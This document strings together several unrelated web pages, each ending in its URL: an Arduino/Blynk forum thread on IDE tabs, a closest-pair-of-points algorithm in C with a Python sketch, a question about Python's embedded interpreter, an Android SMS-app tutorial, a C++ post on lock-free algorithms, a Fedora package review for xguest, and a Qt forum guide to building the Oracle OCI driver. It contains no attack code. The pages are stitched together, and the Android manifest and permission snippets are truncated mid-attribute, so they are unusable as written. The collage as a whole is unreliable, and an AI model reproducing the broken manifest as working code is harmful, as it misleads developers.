personally for me, that article was one of the biggest helps in code organisation with arduino ide in larger projects. it is strange in the beginning, but after you get used to it, it is gold.

5 posts were split to a new topic: Arduino IDE, PlatformIO and other programming options

@JRobert I have tested the Arduino IDE multi-tab setup with my large Arduino Mega 2560 Blynk Testbed Project (24.3KB and 8 tabs full of various Blynkified sensors, relay, servo and LED functions - and growing). No "workarounds" required. I just simply cut and pasted any standard loops and Blynk Function loops into their associated tabs. All #defines, setup() and void loop() stay in the primary tab.
Aside from minimising the vertical scrolling necessary to move through my sketch, everything works normally and compiles fine. No changes required to how I programmed anything. So basically, as long as you are using the IDE tabs correctly and DON'T duplicate any of your #defines, variable declarations, etc. across the tabs (there should be absolutely no need to anyhow), you will be fine.

When I work in the IDE (which is not often) I create a Tab for every function I make. This makes things pretty much neat and orderly. All the setup and run-once stuff I put in the main INO file. I usually add a last Tab with a text file used for documentation, called zz_Documentation.ino or something, so it ends up in the back.

I appreciate everyone's willingness to help, and you've found some useful guidelines for creating multi-file projects. However those do not address the issue I raised and it is not yet solved. Will whomever marked it so please un-mark it. I have submitted a full issue report on GitHub (Issue #312), including a minimum, complete, and verifiable example, and an analysis of what I believe causes it.

Multiple definition errors when including WidgetTimeInput.h in separate class

I "fixed" your example the correct multi-tabbed way and posted it back on Github. Compiles just fine now. PS, delete that BlynkDemoMod1.cpp file before you open the rest into the IDE or you will be right back where you started. If you open the .ino file in the IDE without deleting that .cpp file, then delete it after the fact, you will have to close and reopen the IDE before the rest will compile.
https://community.blynk.cc/t/solved-multiple-include-across-ide-tabs-causing-multiple-definition-errors/13702
From the above 3 steps, we have an upper bound d on the minimum distance. Now we need to consider the pairs such that one point of the pair is from the left half and the other is from the right half. Consider the vertical line passing through the middle point and build an array strip[] of all points that are closer than d to this line. At first look, processing the strip seems to be a O(n^2) step, but it is actually O(n). It can be proved geometrically that for every point in the strip, we only need to check at most 7 points after it (note that the strip is sorted according to the Y coordinate). See this for more analysis.

7) Finally return the minimum of d and the distance calculated in the above step (step 6)

Implementation

Following is a C/C++ implementation of the above algorithm.

// A divide and conquer program in C/C++ to find the smallest distance from a
// given set of points.

#include <stdio.h>
#include <float.h>
#include <stdlib.h>
#include <math.h>

// A structure to represent a Point in 2D plane
struct Point
{
    int x, y;
};

/* Following two functions are needed for library function qsort().
   Refer: */

// Needed to sort array of points according to X coordinate
int compareX(const void* a, const void* b)
{
    Point *p1 = (Point *)a, *p2 = (Point *)b;
    return (p1->x - p2->x);
}

// Needed to sort array of points according to Y coordinate
int compareY(const void* a, const void* b)
{
    Point *p1 = (Point *)a, *p2 = (Point *)b;
    return (p1->y - p2->y);
}

// A utility function to find the distance between two points
float dist(Point p1, Point p2)
{
    return sqrt( (p1.x - p2.x)*(p1.x - p2.x) +
                 (p1.y - p2.y)*(p1.y - p2.y) );
}

// A Brute Force method to return the smallest distance between two points
// in P[] of size n
float bruteForce(Point P[], int n)
{
    float min = FLT_MAX;
    for (int i = 0; i < n; ++i)
        for (int j = i+1; j < n; ++j)
            if (dist(P[i], P[j]) < min)
                min = dist(P[i], P[j]);
    return min;
}

// A utility function to find minimum of two float values
float min(float x, float y)
{
    return (x < y)? x : y;
}

// A utility function to find the distance between the closest points of
// strip of given size. All points in strip[] are sorted according to
// y coordinate. They all have an upper bound on minimum distance as d.
// Note that this method seems to be a O(n^2) method, but it's a O(n)
// method as the inner loop runs at most 6 times
float stripClosest(Point strip[], int size, float d)
{
    float min = d;  // Initialize the minimum distance as d

    qsort(strip, size, sizeof(Point), compareY);

    // Pick all points one by one and try the next points till the difference
    // between y coordinates is smaller than d.
    // It is a proven fact that this loop runs at most 6 times
    for (int i = 0; i < size; ++i)
        for (int j = i+1; j < size && (strip[j].y - strip[i].y) < min; ++j)
            if (dist(strip[i],strip[j]) < min)
                min = dist(strip[i], strip[j]);

    return min;
}

// A recursive function to find the smallest distance. The array P contains
// all points sorted according to x coordinate
float closestUtil(Point P[], int n)
{
    // If there are 2 or 3 points, then use brute force
    if (n <= 3)
        return bruteForce(P, n);

    // Find the middle point
    int mid = n/2;
    Point midPoint = P[mid];

    // Consider the vertical line passing through the middle point,
    // calculate the smallest distance dl on left of middle point and
    // dr on right side
    float dl = closestUtil(P, mid);
    float dr = closestUtil(P + mid, n-mid);

    // Find the smaller of two distances
    float d = min(dl, dr);

    // Build an array strip[] that contains points close (closer than d)
    // to the line passing through the middle point
    Point strip[n];
    int j = 0;
    for (int i = 0; i < n; i++)
        if (abs(P[i].x - midPoint.x) < d)
            strip[j] = P[i], j++;

    // Find the closest points in strip. Return the minimum of d and the
    // closest distance in strip[]
    return min(d, stripClosest(strip, j, d) );
}

// The main function that finds the smallest distance.
// This method mainly uses closestUtil()
float closest(Point P[], int n)
{
    qsort(P, n, sizeof(Point), compareX);

    // Use recursive function closestUtil() to find the smallest distance
    return closestUtil(P, n);
}

// Driver program to test above functions
int main()
{
    Point P[] = {{2, 3}, {12, 30}, {40, 50}, {5, 1}, {12, 10}, {3, 4}};
    int n = sizeof(P) / sizeof(P[0]);
    printf("The smallest distance is %f ", closest(P, n));
    return 0;
}

Note: the code uses quick sort, which can be O(n^2) in the worst case. To keep the upper bound at O(n (Logn)^2), an O(nLogn) sorting algorithm like merge sort or heap sort can be used.

References:
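The same divide-and-conquer idea can be cross-checked with a short Python sketch (my own illustration, not from the original article), which mirrors the C implementation and verifies itself against the brute-force method:

```python
import math

def brute_force(pts):
    """O(n^2) baseline: check every pair."""
    return min(math.dist(p, q)
               for i, p in enumerate(pts)
               for q in pts[i + 1:])

def closest_pair(pts):
    """Divide-and-conquer closest pair; the re-sort inside the strip
    makes this O(n log^2 n)."""
    pts = sorted(pts)  # sort by x coordinate

    def solve(p):
        if len(p) <= 3:
            return brute_force(p)
        mid = len(p) // 2
        mid_x = p[mid][0]
        d = min(solve(p[:mid]), solve(p[mid:]))
        # Points within d of the vertical line, sorted by y coordinate.
        strip = sorted((q for q in p if abs(q[0] - mid_x) < d),
                       key=lambda q: q[1])
        for i, q in enumerate(strip):
            for r in strip[i + 1:]:
                if r[1] - q[1] >= d:
                    break  # geometric argument: only a handful of checks per point
                d = min(d, math.dist(q, r))
        return d

    return solve(pts)

points = [(2, 3), (12, 30), (40, 50), (5, 1), (12, 10), (3, 4)]
print(closest_pair(points))  # same distance as the C driver program reports
```

The break condition in the strip loop is what turns the apparent O(n^2) pass into a linear one, matching the argument in the text.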
https://www.geeksforgeeks.org/closest-pair-of-points/
Hello, I'm having a bit of trouble isolating my scripts from each other in my embedded Python interpreter, so that their global namespaces don't get all entangled. I've had some luck with PyRun_FileEx(), as you can specify dictionaries to use for the globals and locals, but it seems that you can't do the same for PyEval_CallObject() (which I use for calling the callbacks previously registered by scripts run via PyRun_FileEx()). Is there any way to substitute the current global/local dictionaries, run the callback, then switch back to the default? It would be just as good if I could switch between several sets of global variable dictionaries, one for each script; unfortunately, the documentation is less than informative on this point (there isn't even a formal definition for PyEval_CallObject()). Also, I'm aware that eval() and exec() allow you to pass in global/local dictionaries, but I think it'd be a bit wasteful to drop into Python, run exec(), then have that call my callback, rather than just calling the callback directly from the host program. Thanks in advance
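For illustration (at the Python level, not the C API the poster is using): a function defined by exec() in a given globals dict keeps referring to that dict afterwards, so calling a registered callback later needs no dictionary switching at all. This sketch is my own example of that namespace behaviour, not a fix for PyEval_CallObject itself:

```python
# Run two "scripts" in separate global namespaces and register callbacks.
registry = {}

script_a = """
counter = 100
def callback():
    return counter  # resolves in this script's own globals
register('a', callback)
"""

script_b = """
counter = 200
def callback():
    return counter
register('b', callback)
"""

def register(name, fn):
    registry[name] = fn

for src in (script_a, script_b):
    namespace = {'register': register}  # fresh globals dict per script
    exec(src, namespace)

# Each callback still sees the globals of the script that defined it,
# so the two 'counter' variables never collide.
print(registry['a']())  # 100
print(registry['b']())  # 200
```

The C-API equivalent of this observation is that a function object carries its defining globals with it, which is why calling it directly does not entangle the namespaces.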
https://mail.python.org/pipermail/python-list/2005-December/325228.html
In part one, we saw how to create the bare bones of an SMS app. That is to say, we created a utility that could send and receive messages but that wasn’t exactly in a state to replace your current messaging app any time soon. For starters, the app needed to be open in order to receive messages. And you could only message yourself… So yes, we have a ways to go. Let’s sort it out, shall we? And along the way, we’ll learn a number of different skills that can be useful for creating a wide range of different apps!

Receiving messages in the background

The biggest requirement of any SMS app is probably that it should be able to alert you about getting new messages. And if you have to have the app open for that to happen, then that kind of defeats the point. Fortunately, we already created a broadcast receiver that can do this and that receiver will be able to hang around and listen out for our messages in the background by default. The problem is that at the moment the broadcast receiver doesn’t actually do anything to alert us to the new messages – it just updates our list. So the first thing we need to do is to launch MainActivity.java whenever a message is intercepted. To do that, you just need to stick something in the onReceive of the broadcast receiver (which we called SmsBroadcastReceiver). A simple toast message will demonstrate that this works:

Toast.makeText(context, "Message Received!", Toast.LENGTH_SHORT).show();

To open the main app and show the messages, we just need to use startActivity. Except we need to add a flag in order to do this from a class other than an activity. Like so:

Intent i = new Intent(context, MainActivity.class);
i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(i);

This tells Android that a new task is being started – meaning that the user will be brought out of what they are currently doing.
The problem is that if you use this code as it is, you’ll end up creating multiple instances of your activity, which is pretty bad practice. The easy way to solve this problem is in the manifest, where you just need to add the following line to the main activity:

android:launchMode="singleInstance"

This will prevent multiple versions of the same activity being created and thus we won’t need to worry about checking whether or not the activity is at the front. Except we kind of do still, just so that we can decide whether to update our inbox (if the activity is already at the front, then startActivity won’t refresh our inbox otherwise). Do this by creating a static boolean called active in your MainActivity.java and then setting it to ‘true’ onStart and ‘false’ onStop:

static boolean active = false;

@Override
public void onStart() {
    super.onStart();
    active = true;
    inst = this;
}

@Override
public void onStop() {
    super.onStop();
    active = false;
}

Finally, you can then use the following code in your broadcast receiver:

if (MainActivity.active) {
    MainActivity inst = MainActivity.instance();
    inst.updateInbox(smsMessageStr);
} else {
    Intent i = new Intent(context, MainActivity.class);
    i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
    context.startActivity(i);
}

Now your broadcast receiver will listen out for messages and if the app is running, then it will use the usual updateInbox function to refresh the messages. If the app is not running however, then it will be launched and the inbox will automatically be updated. Finally, we also need to ensure that our broadcast receiver starts up as soon as the phone boots. This is something we once again do in the Manifest with:

<action android:

And don’t forget to add the following permission for your app:

<uses-permission android:

Now, whenever you get an incoming text message, your app will launch and show it to the user; even if they haven’t opened your app recently. As soon as the phone is ready to go, so is your app!
This means users will see the message in the inbox and can decide to respond if they so wish. This isn’t really the best practice though, as most people don’t want to be torn away from whatever they’re doing to be forcibly shown your app. Not handy if they’re using Google Maps while they’re driving for instance! Instead then, you might choose to use a transparent activity that only obscures part of the screen (and dismisses itself), you might use a dialog or you might send a push notification. Now that you know how to handle intercepting messages in the background, you can play around with how you want to deal with them. Using broadcast receivers like this is something that will likely come in very handy and you can also use them to set alarms, to listen for other notifications or even to launch apps when the phone is plugged in…

Becoming the default SMS app

While your app is now receiving your messages automatically, it still isn’t doing its full job as an SMS utility. Right now, whichever SMS app you’ve previously been using will still be doing the same thing and your app won’t be an option when other apps use SMS intents. In other words, you’re not the default app; and as yet, you don’t have the option of being it either. The good news is that all we need to do to change this is ensure we have all the right intent filters in our Manifest file. As many of you will know, an intent is a means of two apps communicating with one another and sending instructions. In Google’s grand vision for Android, users experience seamless switching between dedicated apps for different services without feeling as though they’re loading separate ‘programs’. Hence the push toward a consistent Material Design that would ensure a similar design language across utilities. Once we add the right intents then, we ensure our app can be chosen as the default messaging service.
The only problem is that we also need to ensure our app offers all of the functionality that users might expect from their primary SMS tool. We need to support MMS for example, otherwise the device will be left with no default means of opening multimedia messages. We also need to create a service for quick replies. Hoi! But it’s okay, we can get through this if we stick together…

First, we need to create a new broadcast receiver that we’re going to use to receive MMS messages. Unfortunately, receiving MMS is a whole other thing and so we don’t want to go into that right now. Luckily, what we can do is create a kind of ‘place holder’ that will act as a faux MMS receiver in the meantime. Create your new broadcast receiver just like you created the last one and then populate it like so:

package com.nqr.smsapp;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class MMSBroadcastReceiver extends BroadcastReceiver {

    public static final String SMS_BUNDLE = "pdus";

    @Override
    public void onReceive(Context context, Intent intent) {
        throw new UnsupportedOperationException("Coming soon!");
    }
}

What you have here is a broadcast receiver that essentially does nothing… But to be fair, the only people who use MMS these days are our parents (or so I believe). So this will be fine for a lot of people but if you were making a fully fledged SMS app from this, I would recommend coming back and implementing this properly. Likewise, a fully-functional messaging app should also offer the ‘Quick Reply’ option so that users can reject calls with a message or respond to incoming messages without opening the main app. This will require a service to handle that but fortunately, we can just create an empty service again to trick Android.
A service is something that runs silently in the background and doesn’t need to be actively in use by the user. This means we can keep our app open and ready to receive messages, while our user gets on with other things. We can start services from activities, from broadcast receivers and from other services. First though, we need to create one. So make a new class and call it QuickResponseService. Because it is a service that allows us to respond quickly… (although this does sound a little like emergency breakdown cover…) We’re going to add some callback methods seeing as services have their own life cycles – just like activities – and you need these for things to work properly:

import android.app.Service;
import android.content.Intent;
import android.os.IBinder;

public class QuickResponseService extends Service {

    @Override
    public IBinder onBind(Intent arg0) {
        return null;
    }

    @Override
    public void onDestroy() {
        super.onDestroy();
    }

    @Override
    public int onStartCommand(Intent intent, int flags, int startID) {
        return super.onStartCommand(intent, flags, startID);
    }
}

onBind and onDestroy should be fairly self explanatory. onStartCommand meanwhile is what we call in order to start our service. Here we pass the intent so that we can pass information to the service. Luckily, we don’t need to worry about all that because we’re not actually going to be using our service. But if you were creating a different kind of app, then you might want to use a service to handle calculations or other operations in the background when your app was closed. Finally, with all these new classes, we’re now ready to update our manifest in order to make it a suitable candidate as ‘default SMS app’.
Simply add all the following permissions and intent filters to your Manifest: <?xml version="1.0" encoding="utf-8"?> <manifest xmlns: <uses-permission android: <uses-permission android: <uses-permission android: <uses-permission android: <uses-permission android: <application android: <activity android: <intent-filter> <action android: <category android: > <receiver android: <intent-filter android: <action android: <action android: <action android: <action android: </intent-filter> </receiver> <receiver android: <intent-filter android: <action android: <data android: </intent-filter> </receiver> <service android: <intent-filter> <category android: <action android: <data android: <data android: <data android: <data android: </intent-filter> </service> </application> </manifest> This now tells Android that your app is capable of doing everything an SMS app needs to be able to do and if you’ve done everything right, then you should now see it as an option when you head into settings to change your default messaging app! One more thing you need to do though: disable the relevant features when your app is not the default messaging app. Otherwise, it will continue to pop up whenever someone gets a new message, even when they chose to use another service! You can do this simply by querying Telephony.Sms.getDefaultSmsPackage() to see if yours is currently set to default. Tidying up Now the app almost works like any other SMS app and the parts that are missing should be easy enough for you to figure out. All that’s really left is to tidy things up a little. For example, most SMS apps don’t show all your messages in one screen but rather group them by sender. 
This is something you can easily do by editing your refreshSMSInbox with the following:

do {
    String str = "SMS From: " + smsInboxCursor.getString(indexAddress) + "\n" +
            smsInboxCursor.getString(indexBody) + "\n";
    if (smsInboxCursor.getString(indexAddress).equals("PHONE NUMBER HERE")) {
        arrayAdapter.add(str);
    }
} while (smsInboxCursor.moveToNext());

You could simply scan through the messages and use each new sender to generate a list of contacts in a separate activity (creating a new entry only when the sender isn’t already added to the list). From there, show a filtered inbox of only messages from that chosen number in its own thread. It would then be very simple to make the recipient of the message be the person in that thread. And of course you could add a FAB (floating action button) to handle new messages where the number is input manually, probably from the main screen showing the different contacts. Of course most messaging apps also tend to tell you the name of the person messaging you. Using the following function (which relies on ContactsContract), you can easily get the sender’s name rather than just showing their phone number:

public static String getContactName(Context context, String phoneNo) {
    ContentResolver cr = context.getContentResolver();
    Uri uri = Uri.withAppendedPath(ContactsContract.PhoneLookup.CONTENT_FILTER_URI,
            Uri.encode(phoneNo));
    Cursor cursor = cr.query(uri,
            new String[]{ContactsContract.PhoneLookup.DISPLAY_NAME},
            null, null, null);
    if (cursor == null) {
        return phoneNo;
    }
    String Name = phoneNo;
    if (cursor.moveToFirst()) {
        Name = cursor.getString(cursor.getColumnIndex(ContactsContract.PhoneLookup.DISPLAY_NAME));
    }
    if (!cursor.isClosed()) {
        cursor.close();
    }
    return Name;
}

Now you can show the name of the sender, rather than just lots of numbers. Make sure you get permission for READ_CONTACTS though, as this is separate from what we have gotten so far.
Note that you can also get the contact’s photo ID this way and thereby display the contact image next to the contact name and number too – which would result in a much nicer looking UI. And this would be especially true if you were to display the messages on cards using RecyclerView, as we have discussed in the past.

Closing comments

There’s a little work left there for you to do but with that, you should now understand everything necessary to create your own, fully functional SMS app. Get to work on adding those final touches and be sure to share your creations in the comments section. Like I said though, there’s no reason this has to become a typical SMS app just yet and you could always choose to make it into something else, whether that’s an automatically responding AI or an SMS back-up tool. You can find the full source code for this project on GitHub, so get creative!
https://www.androidauthority.com/how-to-create-an-sms-app-part-2-724264/
Blocking, non-blocking, lock-free and wait-free. Each of these terms describes a key characteristic of an algorithm when executed in a concurrent environment. So, reasoning about the runtime behaviour of your program often means putting your algorithm in the right bucket. Therefore, this post is about buckets.

An algorithm falls into one of two buckets: blocking or non-blocking. Let's first talk about blocking. Intuitively, it is quite clear what blocking means for an algorithm. But concurrency is not about intuition, it's about precise terms. The easiest way to define blocking is to define it with the help of non-blocking: an algorithm is called non-blocking if the failure or suspension of any thread cannot cause the failure or suspension of another thread. There is not a single word about locking in this definition. That's right. Non-blocking is a wider term.

To block a program is quite easy. The typical use case is to use more than one mutex and lock them in a different sequence. Nice timing and you have a deadlock. But there are a lot more ways to produce blocking behaviour. Each time you have to wait for a resource, a block is possible. Here are a few examples for synchronising access to a resource: a condition variable or a future. Even the join call of a thread can be used to block a thread.

// deadlockWait.cpp

#include <iostream>
#include <mutex>
#include <string>
#include <thread>

std::mutex coutMutex;

int main(){

  std::thread t([]{
    std::cout << "Still waiting ..." << std::endl;             // 2
    std::lock_guard<std::mutex> lockGuard(coutMutex);          // 3
    std::cout << "child: " << std::this_thread::get_id() << std::endl;}
  );

  {
    std::lock_guard<std::mutex> lockGuard(coutMutex);          // 1
    std::cout << "creator: " << std::this_thread::get_id() << std::endl;

    t.join();                                                  // 5
  }                                                            // 4

}

The program run will block immediately. What is happening? The creator thread locks the mutex in (1). Now, the child thread executes (2). To get the mutex in expression (3), the creator thread first has to unlock it. But the creator thread will only unlock the mutex if the lockGuard (1) goes out of scope in (4).
That will never happen, because the child thread first has to lock the mutex coutMutex.

Let's have a look at the non-blocking algorithms. The main categories for non-blocking algorithms are lock-free and wait-free. Each wait-free algorithm is lock-free and each lock-free algorithm is non-blocking. Non-blocking and lock-free are not the same. There is an additional guarantee, called obstruction-free, which I will ignore in this post because it is not so relevant.

Non-blocking algorithms are typically implemented with CAS instructions. CAS stands for compare and swap. CAS is called compare_exchange_strong or compare_exchange_weak in C++. I will in this post only refer to the strong version. For more information, read my previous post The Atomic Boolean. The key idea of both operations is that a call of atomicValue.compare_exchange_strong(expected, desired) obeys the following rules in an atomic fashion: if atomicValue is equal to expected, atomicValue will be set to desired and the call returns true; if not, expected will be set to atomicValue and the call returns false.

Let's now have a closer look at lock-free versus wait-free. At first, the definitions of lock-free and wait-free: a non-blocking algorithm is lock-free if there is guaranteed system-wide progress; it is wait-free if there is also guaranteed per-thread progress. Both definitions are quite similar. Therefore, it makes a lot of sense to define them together. The algorithm fetch_mult (1) multiplies an std::atomic<T> shared by mult.

template <typename T>
T fetch_mult(std::atomic<T>& shared, T mult){                          // 1
  T oldValue = shared.load();                                          // 2
  while (!shared.compare_exchange_strong(oldValue, oldValue * mult));  // 3
  return oldValue;
}

The key observation is that there is a small time window between the reading of the old value T oldValue = shared.load() (2) and the comparison with the new value (3). Therefore, another thread can always kick in and change the oldValue. If you reason about such a bad interleaving of threads, you see that there can be no per-thread progress guarantee. Therefore, the algorithm is lock-free, but not wait-free.

While a lock-free algorithm guarantees system-wide progress, a wait-free algorithm guarantees per-thread progress. If you reason about the lock-free algorithm in the last example, you will see that a compare_exchange_strong call involves synchronisation. First, you read the old value and then you update the new value if the initial condition already holds.
If the initial condition holds, you publish the new value. If not, you do it once more by putting the call in a while loop. Therefore compare_exchange_strong behaves like an atomic transaction.

The key part of the next program needs no synchronisation.

// relaxed.cpp

#include <vector>
#include <iostream>
#include <thread>
#include <atomic>

std::atomic<int> cnt = {0};

void add(){                                           // 1
    for (int n = 0; n < 1000; ++n) {
        cnt.fetch_add(1, std::memory_order_relaxed);  // 2
    }
}

int main()
{
    std::vector<std::thread> v;
    for (int n = 0; n < 10; ++n) {
        v.emplace_back(add);
    }
    for (auto& t : v) {
        t.join();
    }
    std::cout << "Final counter value is " << cnt << '\n';
}

Have a closer look at function add (1). There is no synchronisation involved in expression (2). The value 1 is just added to the atomic cnt. And here is the output of the program. We always get 10000, because 10 threads increment the value 1000 times.

For simplicity reasons, I ignored a few other guarantees in this post, such as starvation-free as a subset of blocking or wait-free bounded as a subset of wait-free. You can read the details on the blog Concurrency Freaks.

In the next post, I will write about a curiosity. It's the so-called ABA problem, which is a kind of false-positive case for CAS instructions. That means that although it seems that the old value of a CAS instruction is still the same, it changed in the meantime.
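To make the CAS retry loop concrete outside C++, here is a small Python sketch of the lock-free fetch_mult pattern (my own illustration, not from the post). Python exposes no hardware CAS, so compare_and_swap below is simulated with an internal lock; the point is the retry-loop structure built on top of it, which never holds any application-level lock:

```python
import threading

class AtomicInt:
    """Toy atomic integer. compare_and_swap simulates a hardware CAS
    instruction; the algorithm built on top only ever retries, it never
    waits on an application-level lock."""
    def __init__(self, value=0):
        self._value = value
        self._lock = threading.Lock()

    def load(self):
        return self._value

    def compare_and_swap(self, expected, desired):
        # Atomically: if value == expected, store desired and report success;
        # otherwise report failure together with the value actually seen.
        with self._lock:
            if self._value == expected:
                self._value = desired
                return True, expected
            return False, self._value

def fetch_mult(shared, mult):
    """Lock-free style multiply: read, try to publish, retry on interference."""
    old = shared.load()
    while True:
        ok, old = shared.compare_and_swap(old, old * mult)
        if ok:
            return old  # the value before our multiplication

shared = AtomicInt(5)
threads = [threading.Thread(target=fetch_mult, args=(shared, m))
           for m in (2, 3, 7)]
for t in threads: t.start()
for t in threads: t.join()
print(shared.load())  # 5 * 2 * 3 * 7 = 210, regardless of interleaving
```

Note how a failed CAS hands back the freshly observed value, so the retry does not need a separate reload; this mirrors how compare_exchange_strong updates its expected argument on failure.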
https://www.modernescpp.com/index.php/blocking-and-non-blocking
Red Hat Bugzilla – Bug 353931 Review Request: xguest - kiosk user setup program Last modified: 2008-09-22 23:30:47 EDT

Spec URL: SRPM URL: http://people.fedoraproject.org/~dwalsh/xguest/xguest-1.0.2-1.fc8.src.rpm Description: xguest is a package that sets up a locked down user for use in kiosk systems. The user will be controlled so that all they can use is Firefox for reaching the internet.

SRPM URL: First off I would like to get this review as fast as possible, to get inclusion in Fedora 8. Maybe I am too late already. The spec file does a couple of things that cause rpmlint to give errors. These are discussed at: This package could be used in conjunction with Fast User Switching to allow users to share the machines with others with little risk, as well as in kiosk environments.

It would be good to add the license file as %doc. What's the use of calling "exit 0" at the end of each section?

Added and removed exit 0's SRPM URL:

Maybe I am just picky, but I am very much against creating files in %post. I feel that %source1 sepermit.conf, with the appropriate content, copied in %post to the right place would be cleaner and easier to manage/verify via rpm -qV

There are no files being created in %post. sepermit.conf is owned by pam and xguest is just appending "xguest" to the file.

So what is the state of this? How do we move forward?

rpmlint -v ../SRPMS/xguest-1.0.5-2.fc8.src.rpm xguest.src: I: checking
rpmlint -v ../RPMS/noarch/xguest-1.0.5-2.fc9.noarch.rpm xguest.noarch: I: checking
xguest.noarch: E: use-tmp-in-%post
xguest.noarch: E: use-of-home-in-%post

These two aren't actually a use of it but adding the namespace configuration to namespace.conf. As soon as pam_namespace will support config files in namespace.d this should be changed. Perhaps you should save a backup of the existing namespace.conf so it will be possible to restore it after the future change. Of course the backup should be owned by the package as %ghost.
xguest.noarch: E: preun-without-chkconfig /etc/rc.d/init.d/xguest That's a real error and it should be fixed. chkconfig --del should be run for xguest. xguest.noarch: W: service-default-enabled /etc/rc.d/init.d/xguest xguest.noarch: E: no-status-entry /etc/rc.d/init.d/xguest xguest.noarch: W: no-reload-entry /etc/rc.d/init.d/xguest I think these are OK. Status and reload entries do not make much sense as xguest is not a daemon but script containing just some bind mounts. Whether it should be enabled by default or not is debatable but as the %post script creates the xguest user account I think that enabling the polyinstantiation to work for him without further admins actions (except reboot or start of the script for the first time) is fine. xguest.noarch: W: uncompressed-zip /etc/desktop-profiles/xguest.zip That's OK as it is only 177kB anyway. Comment about the wording of Summary and Description: It should be describing what the package does so IMO it should be more like: Summary: gdm. The home and temporary directories of the user will be polyinstantiated and mounted on tmpfs. More notes: The URL:{name}-%{version}.tar.bz2 points to nonexistent file. There is no %defattr(...) on the beginning of %files. SRPM URL: Has been updated with all your suggested fixes. rpmlint -v ../SRPMS/xguest-1.0.6-1.fc8.src.rpm xguest.src: I: checking rpmlint -v ../RPMS/noarch/xguest-1.0.6-1.fc8.noarch.rpm xguest.noarch: I: checking xguest.noarch: E: use-tmp-in-%post xguest.noarch: E: use-of-home-in-%post xguest.noarch: W: service-default-enabled /etc/rc.d/init.d/xguest xguest.noarch: W: no-reload-entry /etc/rc.d/init.d/xguest xguest.noarch: W: uncompressed-zip /etc/desktop-profiles/xguest.zip All these warnings and errors are OK as I wrote in comment #7. The suggested fixes were applied. Package is ACCEPTed. 
One more suggestion - when the namespace.conf file is modified I'd suggest to add a comment line before and after the xguest configuration so it will be easy to remove it as soon as the configuration is moved to an extra file in the future namespace.d. And in the %preun you can already remove these lines between the comment lines. SRPM URL: Has been updated with all your suggested fixes. Spec file now deletes the namespace.conf entry on removal. Dan, the CVS process is here: Please append a New Package CVS Request to this ticket and flip the flag back to ?. New Package CVS Request ======================= Package Name: dwalsh Short Description: SELinux Kiosk User account setup program Owners: dwalsh@redhat.com Branches: F-8 Rawhide InitialCC: sgrubb@redhat.com Cvsextras Commits: Yes New Package CVS Request ======================= Package Name: dwalsh Short Description: SELinux Kiosk User account setup program Owners: dwalsh Branches: F-8 Rawhide InitialCC: sgrubb Cvsextras Commits: No Umm, Dan? Is the package name really dwalsh? I almost committed that to cvs. :) Also, you don't need to list Rawhide as a branch, you always get that one. cvs is done. Package Name: xguest package is in the repos now, closing.
https://bugzilla.redhat.com/show_bug.cgi?id=353931
Important: Please read the Qt Code of Conduct - [SOLVED] connect oracle database from qt creator

Hi everyone. On the Windows platform I am trying to connect to an Oracle database but I get the error QSqlDatabase: QOCI driver not loaded. I installed the Oracle client and PL/SQL Developer on my machine and everything works fine. Also I read the Qt documentation but it didn't help me. Is there an up to date, clear tutorial on how to install the OCI plugin on Windows (and on every platform)? Please help.

Hi, are the oci.dll in the PATH??

Did you mean PATH in Environment Variables? Yes they are.

Ok, I remember I had some issues in the past setting up the OCI Qt drivers on Windows but I don't remember how I solved them (sorry). Now I'm on a Mac and I'm not using Windows anymore (sorry again). Is the driver built and installed correctly? Does QSqlDatabase::drivers() show the QOCI driver??

Yes I tried, the output is QSQLITE, QODBC, QODBC3

Ok. I found the solution. The documentation explains how to build the plugin, but make or nmake didn't work for me, because I have not installed Microsoft Visual C++ on my machine. I made instructions on how to do this:

1. At first don't forget to install the Qt sources. During the installation check the Sources checkbox.

2. Then download and install the Oracle client win32_11gR2_client.zip. Choose the Runtime option during installation (even if you are using a 64 bit OS, download the 32 bit version of the Oracle client). It creates a c:\app\user\product\client_1... directory.

3. Then open the Qt MinGW command line (Start -> All Programs -> Qt[version] -> [version] -> MinGW [version] -> Qt [version] for Desktop MinGW [version]) and move to the oci source folder:

cd C:\Qt\Qt[version][version]\Src\qtbase\src\plugins\sqldrivers\oci

4. Then, as the documentation says, include the OCI (Oracle Call Interface) path and library:

set INCLUDE=%INCLUDE%;c:\app\user\product[version]\client_1\oci\include
set LIB=%LIB%;c:\app\user\product[version]\client_1\oci\lib\msvc

5. Compile the oci driver by executing these two lines:

qmake oci.pro
mingw32-make

It will create two .dll files for you: qsqloci.dll (release version) and qsqlocid.dll (debug version).

6. The last step is to copy these two files into the Qt Creator installation folder. Go to:

C:\Qt\Qt[version][version]\Src\qtbase\plugins\sqldrivers

and copy these files into:

C:\Qt\Qt[version][version]\mingw[version]\plugins\sqldrivers

and you are ready to go. To check the connection try this code:

#include <QCoreApplication>
#include <QtSql>
#include <QDebug>

int main(int argc, char *argv[])
{
    QCoreApplication a(argc, argv);

    QSqlDatabase db = QSqlDatabase::addDatabase("QOCI");
    db.setHostName("MY_IP_OR_HOST_NAME");
    db.setDatabaseName("XE");
    db.setUserName("test");
    db.setPassword("test_password");

    if (!db.open()) {
        qDebug() << db.lastError().text();
    } else {
        qDebug() << "Wow opened";
    }

    return a.exec();
}
https://forum.qt.io/topic/53051/solved-connect-oracle-database-from-qt-creator